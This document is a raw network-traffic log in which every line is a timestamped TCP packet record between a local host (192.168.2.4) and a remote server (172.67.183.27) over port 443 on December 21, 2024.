                                                                                                                                            Dec 21, 2024 20:13:52.901823044 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:52.901861906 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.023279905 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.023365021 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.023408890 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.023427010 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.023452044 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.023488998 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.056277037 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.056337118 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.056381941 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.056397915 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.056421041 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.056762934 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.062553883 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.062598944 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.062640905 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.062650919 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.062674046 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.062728882 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.068497896 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.068564892 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.068603039 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.068609953 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.068630934 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.068670034 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.075086117 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.075131893 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.075175047 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.075181961 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.075207949 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.075468063 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.091077089 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.091136932 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.091177940 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.091191053 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.091203928 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.091294050 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.097374916 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.097421885 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.097496033 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.097496033 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.097507000 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.097609043 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.104015112 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.104063988 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.104103088 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.104111910 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.104137897 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.104192972 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.215588093 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.215663910 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.215708017 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.215723991 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.215753078 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.215823889 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.248677969 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.248756886 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.248795033 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.248806953 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.248856068 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.248856068 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.255302906 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.255367994 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.255448103 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.255448103 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.255462885 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.257841110 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.261245966 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.261286020 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.261342049 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.261353016 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.261396885 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.261396885 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.267745972 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.267785072 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.267819881 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.267828941 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.267853975 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.267936945 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.283147097 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.283215046 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.283261061 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.283274889 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.283305883 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.284806013 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.289711952 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.289755106 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.289783001 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.289793015 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.289817095 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.289907932 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.300035954 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.300103903 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.300144911 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.300154924 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.300177097 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.300434113 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.436328888 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.436392069 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.436428070 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.436443090 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.436471939 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.436531067 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.441073895 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.441137075 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.441164970 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.441176891 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.441201925 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.441282988 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.447499990 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.447559118 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.447599888 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.447606087 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.447639942 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.447701931 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.454154968 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.454196930 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.454233885 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.454240084 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.454266071 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.454319954 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.474678040 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.474745989 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.474790096 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.474798918 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.474823952 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.474867105 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.480103970 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.480165005 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.480202913 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.480207920 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.480231047 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.480273008 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.485873938 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.485915899 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.485961914 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.485961914 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.485969067 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.486041069 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.492824078 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.492871046 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.492908955 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.492913961 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.492939949 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.492986917 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.628561020 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.628618956 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.628667116 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.628694057 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.628712893 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.629117966 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.633709908 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.633754015 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.633788109 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.633796930 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.633819103 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.633847952 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.639589071 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.639635086 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.639668941 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.639674902 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.639704943 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.639982939 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.646133900 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.646184921 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.646260977 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.646260977 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.646270990 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.649595976 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.669269085 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.669297934 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.669364929 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.669365883 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.669375896 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.669469118 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.672163963 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.672243118 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.672285080 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.672291040 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.672313929 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.673728943 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.678503990 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.678555012 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.678595066 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.678601027 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.678626060 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.681371927 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.685007095 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.685050964 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.685089111 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.685095072 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.685142994 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.685142994 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.820830107 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.820897102 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.820998907 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.820998907 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.821027994 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.821842909 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.826427937 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.826495886 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.826538086 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.826546907 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.826574087 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.829303026 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.832417965 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.832462072 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.832504034 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.832510948 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.832537889 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.833570004 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.839077950 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.839123964 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.839220047 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.839220047 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.839231014 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.841408968 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.859427929 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.859493017 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.859534025 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.859553099 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.859580040 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.860069990 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.864501953 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.864577055 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.864617109 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.864624023 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.864649057 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.864907980 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.871027946 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.871089935 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.871130943 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.871139050 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.871167898 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.871221066 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.877445936 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.877487898 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.877526999 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.877535105 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:53.877561092 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:53.880253077 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.013437033 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.013504028 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.013550997 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.013571024 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.013591051 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.013605118 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.018970966 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.019037008 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.019066095 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.019073963 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.019121885 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.026077032 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.026119947 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.026169062 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.026180983 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.026195049 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.026235104 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.031578064 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.031625986 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.031668901 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.031677961 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.031713963 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.031724930 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.051533937 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.051594019 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.051604033 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.051620007 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.051642895 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.051657915 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.056648970 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.056710005 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.056747913 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.056757927 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.056770086 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.056791067 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.063955069 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.063998938 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.064027071 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.064038038 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.064064980 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.064079046 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.069541931 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.069582939 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.069626093 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.069633007 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.069664001 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.069684029 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.205591917 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.205661058 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.205687046 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.205703974 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.205722094 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.205749035 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.211394072 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.211467028 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.211467981 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.211500883 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.211523056 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.211549997 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.217134953 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.217179060 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.217197895 CET49737443192.168.2.4172.67.183.27
                                                                                                                                            Dec 21, 2024 20:13:54.217210054 CET44349737172.67.183.27192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:54.217232943 CET49737443192.168.2.4172.67.183.27
